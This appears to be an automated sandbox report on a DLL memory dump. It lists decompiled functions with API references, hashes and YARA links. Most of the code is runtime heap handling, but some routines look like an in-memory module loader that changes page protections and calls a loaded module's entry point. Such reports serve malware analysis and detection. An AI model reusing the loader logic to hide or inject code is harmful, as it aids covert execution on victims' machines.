                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4100373531-0
                                                                                                                                                • Opcode ID: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                • Instruction ID: ee799e3b8b260964baacb2eb61f61a8d535858b77694984a1748e2a29b669165
                                                                                                                                                • Opcode Fuzzy Hash: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                • Instruction Fuzzy Hash: ED81A3B4A00209DFDB04CF94D881AAEB7F1FF89355F248158E819AB351D735EA82CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1000C9E0, Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 16%
                                                                                                                                                			E1000C9E0(intOrPtr* __eax, void* __edx, void* __edi) {
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t20;
				intOrPtr _t36;
				intOrPtr* _t38;

				 *__eax =  *__eax + __edx;
				 *0xba =  *0xba + __edx;
				asm("rol dh, 0x0");
				asm("adc [edx+edi*4], ah");
				 *0xba =  *0xba + __edx;
				 *0x00000178 =  *((intOrPtr*)(0x178)) + __edx;
				asm("adc dl, al");
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				_t14 = _t38;
				 *_t14 =  *_t14 + __edx;
				 *_t14 =  *_t14 + __edx;
				_push(es);
				 *_t14 =  *_t14 + __edx;
				asm("repne rol byte [eax], 0x10");
				asm("adc eax, ebp");
				 *_t14 =  *_t14 + __edx;
				asm("adc [ebx-0x40], ah");
				 *_t14 =  *_t14 + __edx;
				asm("adc [edx+0xc], ch");
				_push(0xc);
				_push(0x103301d0);
				_t15 = E10010534(__eax, __edi, 0xffffffffc29f1178);
				_t36 =  *0x00000180;
				if(_t36 != 0) {
					if( *0x10335f3c != 3) {
						_push(_t36);
						goto L8;
					} else {
						L1000FA03(4);
						 *0x00000174 =  *0x00000174 & 0x00000000;
						_t20 = E1000FA7C(_t36);
						 *0x0000015C = _t20;
						if(_t20 != 0) {
							_push(_t36);
							_push(_t20);
							E1000FAA7();
						}
						 *0x00000174 = 0xfffffffe;
						_t15 = E1000CA86();
						if( *((intOrPtr*)(0x15c)) == 0) {
							_push( *((intOrPtr*)(0x180)));
							L8:
							_push(0);
							_t15 = RtlFreeHeap( *0x10333310); // executed
							_t47 = _t15;
							if(_t15 == 0) {
								_t17 = E1000F720(_t47);
								 *_t17 = E1000F6E5(GetLastError());
							}
						}
					}
				}
				return E10010579(_t15);
			}








                                                                                                                                                0x1000c9e2
                                                                                                                                                0x1000c9ea
                                                                                                                                                0x1000c9ec
                                                                                                                                                0x1000c9ef
                                                                                                                                                0x1000c9f2
                                                                                                                                                0x1000c9f6
                                                                                                                                                0x1000c9f8
                                                                                                                                                0x1000c9fa
                                                                                                                                                0x1000c9fe
                                                                                                                                                0x1000ca00
                                                                                                                                                0x1000ca06
                                                                                                                                                0x1000ca0e
                                                                                                                                                0x1000ca10
                                                                                                                                                0x1000ca16
                                                                                                                                                0x1000ca18
                                                                                                                                                0x1000ca1c
                                                                                                                                                0x1000ca1e
                                                                                                                                                0x1000ca27
                                                                                                                                                0x1000ca2a
                                                                                                                                                0x1000ca2f
                                                                                                                                                0x1000ca30
                                                                                                                                                0x1000ca32
                                                                                                                                                0x1000ca37
                                                                                                                                                0x1000ca3c
                                                                                                                                                0x1000ca41
                                                                                                                                                0x1000ca4a
                                                                                                                                                0x1000ca8f
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ca4c
                                                                                                                                                0x1000ca4e
                                                                                                                                                0x1000ca54
                                                                                                                                                0x1000ca59
                                                                                                                                                0x1000ca5f
                                                                                                                                                0x1000ca64
                                                                                                                                                0x1000ca66
                                                                                                                                                0x1000ca67
                                                                                                                                                0x1000ca68
                                                                                                                                                0x1000ca6e
                                                                                                                                                0x1000ca6f
                                                                                                                                                0x1000ca76
                                                                                                                                                0x1000ca7f
                                                                                                                                                0x1000ca81
                                                                                                                                                0x1000ca90
                                                                                                                                                0x1000ca90
                                                                                                                                                0x1000ca98
                                                                                                                                                0x1000ca9e
                                                                                                                                                0x1000caa0
                                                                                                                                                0x1000caa2
                                                                                                                                                0x1000cab5
                                                                                                                                                0x1000cab7
                                                                                                                                                0x1000caa0
                                                                                                                                                0x1000ca7f
                                                                                                                                                0x1000ca4a
                                                                                                                                                0x1000cabd

                                                                                                                                                APIs
                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2661975262-0
                                                                                                                                                • Opcode ID: f7b2ddd2de68202b80087eaa9991a68d173fd62693897be16f3547a6da0e59f9
                                                                                                                                                • Instruction ID: 9c104269e25e09b57b0ea87c9849c440b78dd2ca8add8690c261728b6e664737
                                                                                                                                                • Opcode Fuzzy Hash: f7b2ddd2de68202b80087eaa9991a68d173fd62693897be16f3547a6da0e59f9
                                                                                                                                                • Instruction Fuzzy Hash: 4921F17AA0E3C55FEB02CB705C957597F609F07295F0A009AE0849B1E7DB689C448BA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1000CA30, Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                			E1000CA30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x103301d0);
				_t8 = E10010534(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10010579(_t8);
				}
				if( *0x10335f3c != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10333310); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000F720(_t31);
						 *_t10 = E1000F6E5(GetLastError());
					}
					goto L9;
				}
				L1000FA03(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000FA7C(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000FAA7();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000CA86();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                                                0x1000ca30
                                                                                                                                                0x1000ca32
                                                                                                                                                0x1000ca37
                                                                                                                                                0x1000ca3c
                                                                                                                                                0x1000ca41
                                                                                                                                                0x1000cab8
                                                                                                                                                0x1000cabd
                                                                                                                                                0x1000cabd
                                                                                                                                                0x1000ca4a
                                                                                                                                                0x1000ca8f
                                                                                                                                                0x1000ca90
                                                                                                                                                0x1000ca90
                                                                                                                                                0x1000ca98
                                                                                                                                                0x1000ca9e
                                                                                                                                                0x1000caa0
                                                                                                                                                0x1000caa2
                                                                                                                                                0x1000cab5
                                                                                                                                                0x1000cab7
                                                                                                                                                0x00000000
                                                                                                                                                0x1000caa0
                                                                                                                                                0x1000ca4e
                                                                                                                                                0x1000ca54
                                                                                                                                                0x1000ca59
                                                                                                                                                0x1000ca5f
                                                                                                                                                0x1000ca64
                                                                                                                                                0x1000ca66
                                                                                                                                                0x1000ca67
                                                                                                                                                0x1000ca68
                                                                                                                                                0x1000ca6e
                                                                                                                                                0x1000ca6f
                                                                                                                                                0x1000ca76
                                                                                                                                                0x1000ca7f
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ca81
                                                                                                                                                0x1000ca81
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ca81

                                                                                                                                                APIs
                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2661975262-0
                                                                                                                                                • Opcode ID: a68615f68ae273e04c94104649a1a2c56dbb06faf4eb5eaf6823c23e20caab59
                                                                                                                                                • Instruction ID: 2e61d7c1472293ced8f4caaf087b0bb9b243e5b1bf119dcbb98009236a764642
                                                                                                                                                • Opcode Fuzzy Hash: a68615f68ae273e04c94104649a1a2c56dbb06faf4eb5eaf6823c23e20caab59
                                                                                                                                                • Instruction Fuzzy Hash: BF016775B0131A9AFB10DBB49C45B5E76A4DF013E5F104109F514AA0D5CF38A940DF56
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1000CE64, Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                			E1000CE64(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10333310; // 0x2230000
					_t20 = _t30;
					if(_t32 == 0) {
						E100119E6(_t12, _t18, _t20, _t32);
						E10011846(0x1e);
						E100115A8(0xff);
					}
					_t1 =  *0x10335f3c; // 0x1
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE07(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10333310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103337d4 == _t2) {
							 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F720(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E100108CA(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}


















                                                                                                                                                0x1000ce64
                                                                                                                                                0x1000ce65
                                                                                                                                                0x1000ce6d
                                                                                                                                                0x1000ce6f
                                                                                                                                                0x1000ce75
                                                                                                                                                0x1000ce77
                                                                                                                                                0x1000ce79
                                                                                                                                                0x1000ce80
                                                                                                                                                0x1000ce8a
                                                                                                                                                0x1000ce90
                                                                                                                                                0x1000ce91
                                                                                                                                                0x1000ce99
                                                                                                                                                0x1000cea9
                                                                                                                                                0x1000ceac
                                                                                                                                                0x1000ceb9
                                                                                                                                                0x1000ceb9
                                                                                                                                                0x1000cebb
                                                                                                                                                0x1000cebf
                                                                                                                                                0x1000cebf
                                                                                                                                                0x1000cebf
                                                                                                                                                0x1000cec3
                                                                                                                                                0x1000cec3
                                                                                                                                                0x1000cec6
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ceae
                                                                                                                                                0x1000ceae
                                                                                                                                                0x1000ceaf
                                                                                                                                                0x1000ceb4
                                                                                                                                                0x1000ceb7
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ceb7
                                                                                                                                                0x1000ce9b
                                                                                                                                                0x1000ce9d
                                                                                                                                                0x1000cea5
                                                                                                                                                0x1000cea5
                                                                                                                                                0x1000ce9f
                                                                                                                                                0x1000ce9f
                                                                                                                                                0x1000ce9f
                                                                                                                                                0x1000cea6
                                                                                                                                                0x1000cec7
                                                                                                                                                0x1000cec7
                                                                                                                                                0x1000cece
                                                                                                                                                0x1000cece
                                                                                                                                                0x1000ced0
                                                                                                                                                0x1000ced4
                                                                                                                                                0x1000cede
                                                                                                                                                0x1000cedf
                                                                                                                                                0x1000cef3
                                                                                                                                                0x1000cef5
                                                                                                                                                0x1000cefa
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000cedf
                                                                                                                                                0x1000cf02
                                                                                                                                                0x1000cee1
                                                                                                                                                0x1000cee2
                                                                                                                                                0x1000cee7
                                                                                                                                                0x1000cee9
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • __FF_MSGBANNER.LIBCMT ref: 1000CE79
                                                                                                                                                  • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
                                                                                                                                                  • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
                                                                                                                                                • __NMSG_WRITE.LIBCMT ref: 1000CE80
                                                                                                                                                  • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
                                                                                                                                                  • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
                                                                                                                                                  • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
                                                                                                                                                  • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
                                                                                                                                                  • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
                                                                                                                                                  • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
                                                                                                                                                  • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
                                                                                                                                                  • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
                                                                                                                                                  • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
                                                                                                                                                  • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
                                                                                                                                                  • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3791426274-0
                                                                                                                                                • Opcode ID: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                • Instruction ID: 6f1a83c6d6f502121b77b2a43b6d62c081e19aaa5c93b61cf19e771af3aa1e29
                                                                                                                                                • Opcode Fuzzy Hash: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                • Instruction Fuzzy Hash: 5401F936B493EE9AF221D765DCC1D6E72CDDBC16F0F220126F948CA59ACB60DC8142E1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001B1C0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E1001B1C0(intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				int _t67;

				if(_a8[2] != 0) {
					_t4 =  &(_a8[3]); // 0x1
					if(( *_t4 & 0x02000000) == 0) {
						_t31 =  &(_a8[3]); // 0x1
						asm("sbb edx, edx");
						_v16 =  ~( ~( *_t31 & 0x20000000));
						_t34 =  &(_a8[3]); // 0x1
						asm("sbb ecx, ecx");
						_v24 =  ~( ~( *_t34 & 0x40000000));
						_t37 =  &(_a8[3]); // 0x1
						asm("sbb eax, eax");
						_v12 =  ~( ~( *_t37 & 0x80000000));
						_t42 = _v24 * 8; // 0x2034e6cd
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t42 + 0x103330c4 + _v12 * 4));
						_t49 =  &(_a8[3]); // 0x1
						if(( *_t49 & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t55 =  &(_a8[2]); // 0xb805ebc0
						_t67 = VirtualProtect( *_a8,  *_t55, _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							_push("Error protecting memory page");
							E1001AE60(_t67);
							return 0;
						}
					}
					_t7 =  &(_a8[1]); // 0x330475c0
					if( *_a8 !=  *_t7) {
						L8:
						return 1;
					}
					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L7:
						_t26 =  &(_a8[2]); // 0xb805ebc0
						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t26, 0x4000,  *((intOrPtr*)(_a4 + 0x34))); // executed
						goto L8;
					} else {
						_t16 =  &(_a8[2]); // 0xb805ebc0
						if( *_t16 %  *(_a4 + 0x3c) != 0) {
							goto L8;
						}
						goto L7;
					}
				}
				return 1;
			}









                                                                                                                                                0x1001b1cd
                                                                                                                                                0x1001b1dc
                                                                                                                                                0x1001b1e5
                                                                                                                                                0x1001b250
                                                                                                                                                0x1001b25b
                                                                                                                                                0x1001b25f
                                                                                                                                                0x1001b265
                                                                                                                                                0x1001b270
                                                                                                                                                0x1001b274
                                                                                                                                                0x1001b27a
                                                                                                                                                0x1001b284
                                                                                                                                                0x1001b288
                                                                                                                                                0x1001b294
                                                                                                                                                0x1001b2a1
                                                                                                                                                0x1001b2a7
                                                                                                                                                0x1001b2b0
                                                                                                                                                0x1001b2bb
                                                                                                                                                0x1001b2bb
                                                                                                                                                0x1001b2c9
                                                                                                                                                0x1001b2d3
                                                                                                                                                0x1001b2db
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b2dd
                                                                                                                                                0x1001b2dd
                                                                                                                                                0x1001b2e2
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b2ea
                                                                                                                                                0x1001b2db
                                                                                                                                                0x1001b1ef
                                                                                                                                                0x1001b1f2
                                                                                                                                                0x1001b243
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b243
                                                                                                                                                0x1001b1fb
                                                                                                                                                0x1001b21f
                                                                                                                                                0x1001b22e
                                                                                                                                                0x1001b23e
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b20d
                                                                                                                                                0x1001b213
                                                                                                                                                0x1001b21d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b21d
                                                                                                                                                0x1001b1fb
                                                                                                                                                0x00000000

                                                                                                                                                Strings
                                                                                                                                                • Error protecting memory page, xrefs: 1001B2DD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Error protecting memory page
                                                                                                                                                • API String ID: 0-1748499907
                                                                                                                                                • Opcode ID: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                • Instruction ID: 8d650c0da19698877930e2c5171e1c21c57976ae84b1b649a9511697b3bf2f19
                                                                                                                                                • Opcode Fuzzy Hash: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                • Instruction Fuzzy Hash: EB41D774A005099FD748DF58C490BA9B3B2FB88310F14C259EC1A8F355C731EE85CB80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1000F7BF, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1000F7BF(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10333310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F764(__eflags);
					__eflags = _t7 - 3;
					 *0x10335f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA34(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10333310);
							 *0x10333310 =  *0x10333310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                                                0x1000f7d0
                                                                                                                                                0x1000f7d8
                                                                                                                                                0x1000f7dd
                                                                                                                                                0x1000f7e2
                                                                                                                                                0x1000f7e7
                                                                                                                                                0x1000f7ea
                                                                                                                                                0x1000f7ef
                                                                                                                                                0x1000f815
                                                                                                                                                0x1000f817
                                                                                                                                                0x1000f818
                                                                                                                                                0x1000f7f1
                                                                                                                                                0x1000f7f6
                                                                                                                                                0x1000f7fb
                                                                                                                                                0x1000f7fe
                                                                                                                                                0x00000000
                                                                                                                                                0x1000f800
                                                                                                                                                0x1000f806
                                                                                                                                                0x1000f80c
                                                                                                                                                0x00000000
                                                                                                                                                0x1000f80c
                                                                                                                                                0x1000f7fe
                                                                                                                                                0x1000f7df
                                                                                                                                                0x1000f7df
                                                                                                                                                0x1000f7e1
                                                                                                                                                0x1000f7e1

                                                                                                                                                APIs
                                                                                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
                                                                                                                                                • HeapDestroy.KERNEL32 ref: 1000F806
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$CreateDestroy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3296620671-0
                                                                                                                                                • Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                • Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
                                                                                                                                                • Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                • Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A960, Relevance: 2.6, APIs: 2, Instructions: 87memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                			E1001A960(void* _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				void* __ebp;
				void* _t49;
				void* _t52;
				intOrPtr _t60;
				void* _t68;
				void* _t70;
				signed int _t76;
				signed int _t87;
				signed int _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;

				_t49 = _a4;
				_v8 = _t49;
				if(_v8 != 0) {
					__eflags =  *(_v8 + 0x10);
					if(__eflags != 0) {
						_t9 =  *_v8 + 0x28; // 0x1ab2068
						_t93 =  *((intOrPtr*)(_v8 + 4)) +  *_t9;
						__eflags = _t93;
						_v12 = _t93;
						_v12( *((intOrPtr*)(_v8 + 4)), 0, 0);
					}
					_push( *((intOrPtr*)(_v8 + 0x30)));
					E1000CA30(_t68, _t94, _t95, __eflags);
					_t97 = _t96 + 4;
					_t70 = _v8;
					__eflags =  *(_t70 + 8);
					if( *(_t70 + 8) == 0) {
						L12:
						_t52 = _v8;
						__eflags =  *(_t52 + 4);
						if( *(_t52 + 4) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x20))))( *((intOrPtr*)(_v8 + 4)), 0, 0x8000,  *((intOrPtr*)(_v8 + 0x34))); // executed
						}
						return HeapFree(GetProcessHeap(), 0, _v8);
					} else {
						_v16 = 0;
						while(1) {
							__eflags = _v16 -  *((intOrPtr*)(_v8 + 0xc));
							if(__eflags >= 0) {
								break;
							}
							_t60 =  *((intOrPtr*)(_v8 + 8));
							_t76 = _v16;
							__eflags =  *(_t60 + _t76 * 4);
							if( *(_t60 + _t76 * 4) != 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))))( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _v16 * 4)),  *((intOrPtr*)(_v8 + 0x34))); // executed
								_t97 = _t97 + 8;
							}
							_t87 = _v16 + 1;
							__eflags = _t87;
							_v16 = _t87;
						}
						_push( *((intOrPtr*)(_v8 + 8)));
						E1000CA30(_t68, _t94, _t95, __eflags);
						_t97 = _t97 + 4;
						goto L12;
					}
				}
				return _t49;
			}



















                                                                                                                                                0x1001a966
                                                                                                                                                0x1001a969
                                                                                                                                                0x1001a970
                                                                                                                                                0x1001a97a
                                                                                                                                                0x1001a97e
                                                                                                                                                0x1001a98b
                                                                                                                                                0x1001a98b
                                                                                                                                                0x1001a98b
                                                                                                                                                0x1001a98e
                                                                                                                                                0x1001a99c
                                                                                                                                                0x1001a99c
                                                                                                                                                0x1001a9a5
                                                                                                                                                0x1001a9a6
                                                                                                                                                0x1001a9ab
                                                                                                                                                0x1001a9ae
                                                                                                                                                0x1001a9b1
                                                                                                                                                0x1001a9b5
                                                                                                                                                0x1001aa13
                                                                                                                                                0x1001aa13
                                                                                                                                                0x1001aa16
                                                                                                                                                0x1001aa1a
                                                                                                                                                0x1001aa37
                                                                                                                                                0x1001aa39
                                                                                                                                                0x00000000
                                                                                                                                                0x1001a9b7
                                                                                                                                                0x1001a9b7
                                                                                                                                                0x1001a9c9
                                                                                                                                                0x1001a9cf
                                                                                                                                                0x1001a9d2
                                                                                                                                                0x00000000
